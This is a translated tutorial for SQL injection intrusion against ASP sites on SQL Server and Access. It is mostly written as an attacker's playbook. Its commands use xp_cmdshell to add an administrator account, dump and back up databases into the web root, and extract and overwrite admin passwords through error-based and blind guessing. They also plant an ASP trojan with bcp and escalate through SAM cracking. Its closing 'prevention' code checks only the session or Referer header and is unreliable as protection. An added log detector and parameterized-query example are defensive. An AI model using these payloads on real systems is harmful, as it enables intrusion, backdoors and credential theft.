
About SQL injection

〈1〉 The SQL injection approach

The approach matters most. In fact, many people do not know what SQL can do. The following is the general idea of an SQL injection intrusion:

1. Judge whether an SQL injection vulnerability exists, that is, find the injection point.

2. Judge the backend database type.

3. Determine whether XP_CMDSHELL can be executed. If the account currently connected to the database has SA permission, and the extended stored procedure master.dbo.xp_cmdshell (calling this stored procedure gives direct use of the operating system shell) can be executed correctly, the whole computer can be completely controlled by several methods and the whole injection process is complete; otherwise, continue with:

1. Discover the WEB virtual directory.

2. Upload ASP Trojan;

3. Get administrator permissions

Specific steps:

First, the judgment of SQL injection vulnerabilities.

If you have not done injection before, first clear the check box in front of IE menu - Tools - Internet Options - Advanced - "Show friendly HTTP error messages".

To explain the problem clearly, the following uses /news.asp?id=xx as the example (this address is fictitious), where xx may be an integer or a string.

1. Judging integer parameters

When the input parameter xx is an integer, the original SQL statement in news.asp is generally as follows:

select * from tablename where field=xx, so the following steps can be used to test whether SQL injection exists.

The simplest way to judge:

/news.asp?id=xx' (with a single quote)

At this point the SQL statement in news.asp becomes:

select * from tablename where field=xx'

If the program does not filter the single quote ('), news.asp will report an error. Although this method is simple, it is not the best, because:

First, the IIS of each server may not return a specific error message to the client. If a statement such as cint(parameter) has been added to the program, SQL injection will not succeed, but the server will still report an error; the message is: "The server encountered an error while processing the URL. Please contact the system administrator."

Second, most programmers now filter the single quote, so it cannot be used to test the injection point; the classic 1=1 and 1=2 tests are generally used instead, as follows:

/news.asp?id=xx and 1=1, news.asp runs normally,

and the result is the same as /news.asp?id=xx;

/news.asp?id=xx and 1=2, news.asp runs abnormally (this is the classic 1=1, 1=2 judgment method).

If the above conditions are met, there is an SQL injection vulnerability in news.asp; otherwise it may not be injectable.

2. Judging string parameters

The method is basically the same as for numeric parameters.

When the input parameter xx is a string, the original SQL statement in news.asp is usually as follows:

select * from tablename where field='xx', so the following steps can be used to test whether SQL injection exists.

/news.asp?id=xx' (with a single quote), the SQL statement in news.asp becomes:

select * from tablename where field='xx'', and news.asp runs abnormally;

/news.asp?id=xx' and '1'='1, news.asp runs normally,

and the result is the same as /news.asp?id=xx;

/news.asp?id=xx' and '1'='2, news.asp runs abnormally;

If the above conditions are met, there is an SQL injection vulnerability in news.asp; otherwise it cannot be injected.

3. Handling special cases

Sometimes ASP programmers filter out characters such as the single quote to prevent SQL injection. In that case you can try the following methods.

① Mixed case: because VBS is case-insensitive, programmers usually filter either the all-uppercase or the all-lowercase string, and mixed case is often ignored; for example, use SelecT instead of select or SELECT;

② UNICODE: IIS uses the UNICODE character set for internationalization, and the string entered in IE can be completely converted into a UNICODE string for input, for example + = %2B, space = %20, etc. See Annex I for information on URLEncode;

③ ASCII code: some or all of the entered characters can be replaced with their ASCII codes;

④ Besides the above methods, there is a simpler way: use a ready-made tool, such as NBSI from NB Alliance, a very good tool whose latest version is 2.2.

Second, judge the database type.

Different databases have different functions and injection methods, so before injecting we should judge the database type. Generally, the databases most commonly used with ASP are Access and SQL Server, and more than 99% of websites on the Internet use one of the two.

How can the program tell you which database it uses? Let us see:

SQL Server has some system variables. If the IIS error messages of the server have not been turned off and SQL Server returns an error message, you can get it directly from the error message. The method is as follows:

/news.asp?id=xx and user>0

This statement is very simple, but it contains the essence of SQL Server's unique injection method; I found this efficient guessing method myself during an unintentional test. Let us see what it means: the first part of the statement is normal, the focus is on user>0. As we know, user is a built-in variable of SQL Server whose value is the user name of the current connection, and its type is nvarchar. When an nvarchar value is compared with the int number 0, the system first tries to convert the nvarchar value to int, and of course an error occurs during the conversion. SQL Server's error message is: Syntax error converting the nvarchar value 'abc' to a column of data type int. Hehe, abc is the value of the variable user, so you get the database user name as easily as blowing off dust. In the next few pages you will see many statements that use this method. By the way, as everyone knows, the SQL Server user sa is a role equivalent to Administrators; with sa permission it is almost certain that one can obtain administrator of the host. The above method can easily test whether you are logged in as sa. Note that if you are logged in as sa, the message says there is an error converting "dbo" to int, not "sa".

How to determine the database type if the server's IIS does not return error messages? We can start from the differences between Access and SQL Server. Both have their own system tables, for example the table that stores all objects in the database: in Access it is the system table [msysobjects], but reading this table in the Web environment prompts "no permission"; in SQL Server it is the table [sysobjects], which can be read normally in the Web environment.

When injection has been confirmed, use the following statements:

/news.asp?id=xx and (select count(*) from sysobjects)>0

/news.asp?id=xx and (select count(*) from msysobjects)>0

If the database is SQL Server, the page of the first URL is roughly the same as the original page /news.asp?id=xx, and the second URL prompts an error because the table msysobjects cannot be found; even if the program has error handling, the page is completely different from the original page.

If the database is Access, the situation is different: the page of the first URL is completely different from the original page; the second URL depends on whether the database settings allow reading system tables, which is generally not allowed, so it is also completely different from the original page. In most cases the first URL alone tells you the database type used by the system; the second URL is only used for verification when IIS error messages are enabled.

Third, determine whether XP_CMDSHELL can be executed.

If the account currently connected to the database has SA permission, and the extended stored procedure master.dbo.xp_cmdshell (calling this stored procedure gives direct use of the operating system shell) can be executed correctly, the whole computer can be completely controlled by the following methods, and all subsequent steps can be omitted.

1. /news.asp?id=xx and user>0 news.asp executes abnormally, but you get the user name of the currently connected database (if dbo is displayed, it means SA).

2. /news.asp?id=xx and db_name()>0 news.asp executes abnormally, but you get the name of the currently connected database.

3. /news.asp?id=xx;exec master..xp_cmdshell "net user aaa bbb /add"-- (master is the main database of SQL Server; the semicolon means SQL Server finishes executing the statement before the semicolon and then continues with the statement after it; the "--" sign is a comment, meaning everything after it is only a comment and the system will not execute it.) This directly adds an operating system account aaa with the password bbb.

4. /news.asp?id=xx;exec master..xp_cmdshell "net localgroup administrators aaa /add"-- adds the newly added account aaa to the administrators group.

5. /news.asp?id=xx;backup database dbname to disk='c:\inetpub\wwwroot\save.db' and then get the data contents: back it all up to the WEB directory, then download this file over HTTP (of course, you must know the WEB virtual directory first).

6. Create a UNICODE vulnerability by copying CMD:

/news.asp?id=xx;exec master.dbo.xp_cmdshell "copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe" creates a UNICODE vulnerability, and the whole computer is controlled through this vulnerability (of course, knowing the WEB virtual directory is the first requirement).

In this way you have successfully completed an SQL injection attack. Take it easy; in practice you will find this much harder than in theory, and more difficulties will be waiting for you. Keep going: if the above conditions are not met, you still need to continue the struggle.

Go on ~!

When the above conditions are not met, the following steps should be continued.

(1) Discovering the WEB virtual directory

Only by finding the WEB virtual directory can we determine where to place the ASP Trojan and then obtain user rights. There are two more effective methods.

One is guessing from experience. Generally, the WEB virtual directory is c:\inetpub\wwwroot, d:\inetpub\wwwroot, e:\inetpub\wwwroot, etc.,

and the executable virtual directory is c:\inetpub\scripts, d:\inetpub\scripts, e:\inetpub\scripts, etc.

The second is to traverse the directory structure of the system, analyze the results, and find the WEB virtual directory.

First, create a temporary table temp:

/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

Next:

1. We can use xp_availablemedia to get all current drives and store them in the temp table:

/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--

We can get the list of drives and related information by querying the contents of temp.

2. We can use xp_subdirs to get the subdirectory list and store it in the temp table:

/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--

3. We can also use xp_dirtree to get the directory tree of all subdirectories and put it in the temp table:

/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

In this way you can successfully browse the list of all directories (folders).

If we need to view the contents of a file, we can execute xp_cmdshell:

/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--

Or use the "bulk insert" syntax to insert a text file into the temporary table, for example: bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'

Browse temp to view the contents of the file index.asp! By analyzing the various ASP files we can obtain a lot of system information, website construction and management information, and even the connection password of the SA account.

Of course, if xp_cmdshell can be executed, we can use it to do this:

/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--

/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\*.asp /s /a';--

Through xp_cmdshell we can see everything we want, including W3svc:

/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'

However, if we do not have SA permission, we can still use:

/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

Note:

1. Everything in temp should be deleted after each browse. The deletion method is:

/news.asp?id=xx;delete from temp;--

2. The way to browse the temporary table is (assuming TestDB is the name of the currently connected database):

/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp)>0

This takes the value of the id field of the first record in the table temp and compares it with an integer. Obviously news.asp works abnormally, but the value of the id field appears in the error. Assuming the value found is xyz, then

/news.asp?id=xx and (select top 1 id from TestDB.dbo.temp where id not in ('xyz'))>0

gets the value of the id field of the second record in the table temp.

(2) Uploading an ASP Trojan

The so-called ASP Trojan is ASP code with special functions placed in the scripts directory of the WEB virtual directory; it can be executed by a remote client through IE, and the user rights of the system are then obtained to achieve initial control of the system. There are generally two effective ways to upload an ASP Trojan:

1. Use the remote management function of the WEB.

To facilitate maintenance, many websites provide remote management functions. There are also many websites where different users have different access rights. To control users' rights, there is a web page that requires a user name and password; only by entering the correct values can the next operation proceed and WEB management be carried out, such as uploading and downloading files, browsing directories, modifying configuration, etc.

Therefore, if you get the correct user name and password, you can not only upload an ASP Trojan, but sometimes even get the right to browse the system directly, and the complicated "discover the WEB virtual directory" operation of the previous step can be omitted.

User names and passwords are usually stored in a table; finding this table and reading its contents solves the problem. Here are two effective methods.

A. The injection method:

In theory, authentication web pages contain a statement such as:

select * from admin where username='XXX' and password='YYY', and it is easy to achieve SQL injection if the necessary character filtering is not done before the statement is actually run.

If you enter abc' or 1=1-- in the user name box and 123 in the password box, the SQL statement becomes:

select * from admin where username='abc' or 1=1-- and password='123'

No matter what user name and password the user enters, this statement can always be executed correctly, and the user can easily fool the system and obtain a legal identity.

B. The guessing method:

The basic idea is: guess all database names, guess each table name in the database, analyze which table names may store user names and passwords, guess each field name in the table, and guess the content of each record in the table.

Guess all the database names:

/news.asp?id=xx and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)<>0

Because dbid values 1 to 5 are used by the system, user-created databases must start from 6. We submit name>1 (the name field is a character field, so comparing it with a number produces an error); news.asp works abnormally and the first database name can be obtained. Similarly, by changing dbid to 7, 8, 9, 10, 11, 12 in turn, all database names can be obtained.

In the following it is assumed that the database name obtained is TestDB.

Guess the name of the user name table in the database

Guessing method: guess the table name from personal experience. Generally speaking, table names such as

user, users, member, members, userlist, memberlist, userinfo, manager, admin, adminuser, systemuser, sysuser, sysuserinfo, sysaccount, systemaccount, etc. are judged with

/news.asp?id=xx and (select count(*) from TestDB.dbo.tablename)>0. If the table name exists, news.asp works normally, otherwise abnormally. Repeat this until the name of the system account table is guessed.

Reading method: SQL Server has a table sysobjects that stores core system information. Information about all tables, views and other objects in the database is stored in this table, and it can be accessed through the WEB.

Records with xtype='U' and status>0 represent user-created tables. By finding and analyzing each user-created table and its name, the name of the user name table can be obtained. The basic implementation is as follows:

① /news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0)>0

gets the name of the first user-created table and compares it with an integer. Obviously news.asp works abnormally, but the table name appears in the error. Assuming the table name found is xyz, then

② /news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype='U' and status>0 and name not in ('xyz'))>0

gets the name of the second user-created table. Similarly, the names of all user-created tables can be obtained.

From the table names it can generally be assumed which table stores the user names and passwords. Let us assume this table is named admin.

Guess the names of the user name and password fields.

There must be a user name field and a password field in the admin table. Only by getting the names of these two fields can we get their contents. How to get their names? Again there are two methods.

Guessing method: guess the field name from personal experience. Generally, commonly used user name field names are: username, name, user, account, etc.; commonly used password field names are: password, pass, pwd, passwd, etc. Judge with

/news.asp?id=xx and (select count(username) from TestDB.dbo.admin)>0. The statement "select count(fieldname) from tablename" gets the number of rows in the table, so if the field name exists news.asp works normally, otherwise abnormally. Repeat this until the names of the two fields are guessed.

Reading method: the basic implementation is

/news.asp?id=xx and (select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects)>0

select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects gets, from sysobjects, the first field name of the table whose name is known. Compared with an integer, news.asp obviously works abnormally, but the field name appears in the error. Replacing the 1 in col_name(object_id('admin'),1) with 2, 3, 4, 5, 6 ... gets all field names.

Guess the user name and password.

The most common and effective way to guess the content of the user name and password is:

Character-by-character ASCII decoding: although this method is slow, it is certainly feasible. The basic idea is to guess the length of the field first and then guess the value of each position in turn. The method of guessing the user name is the same as for the password; the following example illustrates the process of guessing the user name.

/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=X (X=1, 2, 3, 4, 5, ... n; username is the name of the user name field and admin is the name of the table). If for a certain value X=i news.asp runs normally, then i is the length of the first user name. For example, when

/news.asp?id=xx and (select top 1 len(username) from TestDB.dbo.admin)=8 is entered and news.asp runs normally, the length of the first user name is 8.

/news.asp?id=xx and (select top 1 ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m ranges from 1 to the user name length obtained in the previous step, that is m=1, 2, ...; n is the ASCII value of 1~9, a~z and A~Z, that is, any value between 1 and 128; admin is the name of the system user account table). If for a certain value n=i news.asp works normally, then the character whose ASCII code is i is one character of the user name. For example, when

/news.asp?id=xx and (select top 1 ascii(substring(username,3,1)) from TestDB.dbo.admin)=80 is entered and news.asp runs normally, the third character of the user name is P (the ASCII code of P is 80); when /news.asp?id=xx and (select top 1 ascii(substring(username,9,1)) from TestDB.dbo.admin)=33 is entered and news.asp runs normally, the 9th character of the user name is ! (the ASCII code of ! is 33).

After guessing the first user name and password, all other user names and passwords can be guessed in the same way. Note: sometimes the password obtained is encrypted information such as MD5 and needs special tools to decrypt, or you change the password first and change it back after use; see the instructions below.

Simple method: guess the user name with /news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where username>1), where flag is a field in the admin table and username is the user name field. news.asp works abnormally, but the value of the user name can be obtained. In the same way you get the second user name, the third user name and so on, until all user names in the table are obtained.

Guess the user password: /news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd>1), where flag is a field in the admin table and pwd is the password field. news.asp works abnormally, but the value of pwd can be obtained. As above, you get the password of the second user, the third user, and so on until the passwords of all users in the table. Passwords are sometimes MD5-encrypted and can be changed:

/news.asp?id=xx;update TestDB.dbo.admin set pwd='A0B923820DCC509A' where username='www';-- (A0B923820DCC509A is the MD5 value of 1, that is, the password is changed to 1; www is a known user name). Of course, you can change the password back to its original value in the same way.
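As an added example that is not part of the original page, the following detector looks for the probes described in the three judgment sections and in the guessing section above (1=1/1=2, user>0, sysobjects/msysobjects, ;exec ... xp_*, len()/ascii(substring())) in constructed IIS W3C log lines, after undoing the URL encoding and mixed case evasions listed under special cases. The field order, the sample addresses and the blind-probe threshold are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (date time c-ip cs-method cs-uri-stem cs-uri-query
# sc-status), made up for this example; not taken from any real server.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-05-01 10:00:01 10.0.0.5 GET /news.asp id=123 200
2004-05-01 10:00:02 10.0.0.5 GET /news.asp id=123%20and%201=1 200
2004-05-01 10:00:03 10.0.0.5 GET /news.asp id=123%20and%201=2 500
2004-05-01 10:00:04 10.0.0.5 GET /news.asp id=123%20and%20user%3E0 500
2004-05-01 10:00:05 10.0.0.5 GET /news.asp id=123%20and%20(select%20count(*)%20from%20msysobjects)%3E0 500
2004-05-01 10:00:06 10.0.0.5 GET /news.asp id=123;exec%20master..xp_cmdshell%20'dir%20c:\\'-- 500
2004-05-01 10:00:07 10.0.0.5 GET /news.asp id=123%20and%20(SeLeCt%20top%201%20len(username)%20from%20TestDB.dbo.admin)=8 200
2004-05-01 10:00:08 10.0.0.5 GET /news.asp id=123%20and%20(select%20top%201%20ascii(substring(username,1,1))%20from%20TestDB.dbo.admin)=65 500
2004-05-01 10:00:09 10.0.0.5 GET /news.asp id=123%20and%20(select%20top%201%20ascii(substring(username,1,1))%20from%20TestDB.dbo.admin)=80 200
2004-05-01 10:00:10 10.0.0.5 GET /news.asp id=123%20and%20(select%20top%201%20ascii(substring(username,2,1))%20from%20TestDB.dbo.admin)=97 200
2004-05-01 10:01:00 10.0.0.9 GET /news.asp id=45 200
2004-05-01 10:01:05 10.0.0.9 GET /news.asp id=45&page=2 200
"""

# One signature per probe family described on the page, applied to the normalized query.
SIGNATURES = [
    ("tautology", re.compile(r"\band\s+'?1'?\s*=\s*'?[12]\b")),        # and 1=1 / and '1'='2
    ("type_conversion", re.compile(r"\b(user|db_name\(\))\s*>\s*0")),  # and user>0
    ("system_table", re.compile(r"\b(m?sysobjects|sysdatabases|syscolumns|sysxlogins)\b")),
    ("stacked_exec", re.compile(r";\s*exec(ute)?\b.*\bxp_\w+")),        # ;exec master..xp_*
    ("stacked_dml", re.compile(r";\s*(insert|create\s+table|delete|update|backup\s+database)\b")),
    ("blind_guess", re.compile(r"\b(len|ascii)\s*\(")),                  # len() / ascii(substring())
]


def normalize(query):
    """Undo the evasions the page lists: URL (UNICODE) encoding and mixed case."""
    return re.sub(r"\s+", " ", unquote_plus(query)).lower()


def parse_line(line):
    """Return (c-ip, cs-uri-stem, cs-uri-query, sc-status) or None for header/short lines."""
    parts = line.split()
    if not parts or parts[0].startswith("#") or len(parts) < 7:
        return None
    return parts[2], parts[4], parts[5], int(parts[6])


def classify(query):
    """Names of all signatures matching one query string, in SIGNATURES order."""
    norm = normalize(query)
    return [name for name, rx in SIGNATURES if rx.search(norm)]


def scan(log_text, blind_threshold=3):
    """Return (findings, flagged): per-line hits, and c-ip -> sorted list of reasons."""
    findings, per_ip, taut_status = [], defaultdict(Counter), defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, stem, query, status = rec
        cats = classify(query)
        if cats:
            findings.append((ip, stem, status, cats))
            per_ip[ip].update(cats)
            if "tautology" in cats:
                taut_status[ip].add(status)
    flagged = {}
    for ip, counts in per_ip.items():
        reasons = {c for c in counts if c != "blind_guess"}
        # a lone len()/ascii() may be legitimate; a run of them is the char-by-char guessing
        if counts["blind_guess"] >= blind_threshold:
            reasons.add("blind_guess")
        # the page's own 1=1 vs 1=2 test: different responses mean the input reached SQL
        if len(taut_status[ip]) > 1:
            reasons.add("differential_response")
        if reasons:
            flagged[ip] = sorted(reasons)
    return findings, flagged
```

Running scan(SAMPLE_LOG) flags 10.0.0.5 for every probe family plus the 200/500 split on its 1=1 and 1=2 requests, while 10.0.0.9 stays clean.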

2. Use the function that converts table contents into a file.

SQL Server has the BCP command, which can export the contents of a table to a text file at a specified location. Using this function, we can first create a temporary table, enter an ASP Trojan into the table line by line, and then export it with the BCP command to form an ASP file.

The command line format is:

bcp "select * from text..foo" queryout c:\inetpub\wwwroot\163.asp -c -Slocalhost -Usa -Pfoobar

(the 'S' parameter is the server executing the query, the 'U' parameter is the user name, and the 'P' parameter is the password; finally a Trojan 163.asp is uploaded).

3. Use tools, such as NBSI; among the reference data it gives, the most important table names are:

select * from sysobjects

sysobjects, ncsysobjects

sysindexes, tsysindexes

syscolumns

systypes

sysusers

sysdatabases

sysxlogins

sysprocesses

Some of the most important user names (existing in the default SQL database):

public

dbo

guest (generally disabled, or without permission)

db_securityadmin

db_ddladmin

Some default extended stored procedures:

xp_regaddmultistring

xp_regdeletekey

xp_regdeletevalue

xp_regenumkeys

xp_regenumvalues

xp_regread

xp_regremovemultistring

xp_regwrite

xp_availablemedia: drives and media

xp_dirtree: directory tree

xp_enumdsn: ODBC connections

xp_loginconfig: server security mode information

xp_makecab: creates a compressed archive

xp_ntsec_enumdomains: domain information

xp_terminate_process: terminates a process, given a PID

(3) Getting system administrator permissions

An ASP Trojan only has user rights. To gain complete control of the system, system administrator rights are also needed. What can be done? There are many ways to raise privileges:

Upload a Trojan and modify the .ini files that run automatically at startup (once the machine restarts, it is done for);

Copy CMD.exe into the scripts directory to artificially create a UNICODE vulnerability;

Download the SAM file and crack it to get all user names and passwords of the OS;

And so on; according to the specific situation of the system, different methods can be adopted.

So how do we prevent injection? The following can be added to ASP, HTML, PHP or CGI programs; it has been tested. Add it at the beginning of the top.asp file.

Method 1:

<%if session("username")="" or session("userkey")="" then
Response.Redirect "../../"
end if%>

(Note: as long as there is user injection, jump to the ../../ directory, hehe, see how you inject me)

Method 2:

<%
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
if mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#eeeeee width=450>"
response.write "<tr><td style=""font:9pt Verdana"">"
response.write "The path you submitted is wrong. It is forbidden to submit data from outside the website. Please do not tamper with this parameter!"
response.write "</td></tr></table></center>"
response.end
end if
%>

(Note: as long as there is user injection, it is judged as an external connection, hehe, see how you inject me)

Method 3:

<%dim From_url,Serv_url
From_url=Cstr(Request.ServerVariables("HTTP_REFERER"))
Serv_url=Cstr(Request.ServerVariables("SERVER_NAME"))
if mid(From_url,8,len(Serv_url))<>Serv_url then
response.write "No"
response.redirect("../")
response.end
end if%>
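As an added example (not the page's code), the login statement from the injection method above and the /news.asp?id=xx query, each in the page's concatenated form beside a parameterized form; sqlite3 stands in for SQL Server, and the admin and news rows are constructed. The three prevention methods above only check the session or the Referer header, which the client supplies, whereas binding parameters removes the injection itself.

```python
import sqlite3


def make_db():
    """In-memory database with a constructed admin row and two constructed news rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin(username text, password text)")
    conn.execute("insert into admin values ('www', 's3cret')")
    conn.execute("create table news(id integer, title text)")
    conn.executemany("insert into news values (?, ?)", [(1, "first"), (2, "second")])
    return conn


def login_concat(conn, username, password):
    """The page's vulnerable login: input pasted straight into the statement text."""
    sql = "select * from admin where username='%s' and password='%s'" % (username, password)
    return conn.execute(sql).fetchone() is not None


def login_param(conn, username, password):
    """Hardened login: values are bound as parameters and never parsed as SQL."""
    sql = "select * from admin where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def news_concat(conn, id_text):
    """The page's /news.asp?id=xx pattern with an unvalidated integer parameter."""
    return conn.execute("select title from news where id=" + id_text).fetchall()


def news_safe(conn, id_text):
    """Integer parameter: reject non-numbers (the page's cint() idea) and bind the value.
    Returns None for rejected input."""
    try:
        news_id = int(id_text)
    except ValueError:
        return None
    return conn.execute("select title from news where id=?", (news_id,)).fetchall()
```

With the page's abc' or 1=1-- payload the concatenated login succeeds and the parameterized one fails; news_concat("1 and 1=1") and news_concat("1 and 1=2") reproduce the 1=1/1=2 difference, and news_concat("1'") raises sqlite3.OperationalError, the "runs abnormally" signal the page relies on.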